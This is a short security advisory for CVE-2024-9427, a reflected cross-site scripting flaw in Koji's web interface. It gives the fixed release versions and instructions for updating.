CVE-2024-9427

New XSS attack on kojiweb

Summary

An unsanitized input allows for an XSS attack. Javascript code from a malicious link could be reflected in the resulting web page. At present, we do not believe that this can be used to submit an action or make a change in Koji due to existing XSS protections in the code. Even so, this is a serious issue and we recommend applying this update promptly.

Bug fix

We are releasing updates for affected versions of Koji from within the past year. The following releases all contain the fix:

  • 1.35.1

  • 1.34.3

  • 1.33.2

Anyone using a Koji version older than a year should update to a more current version as soon as possible.

For users who have customized their Koji code, we recommend rebasing your work onto the appropriate update release. Please see Koji issue #4204 for the code details.

As with all changes to web code, you must restart httpd for the changes to take effect.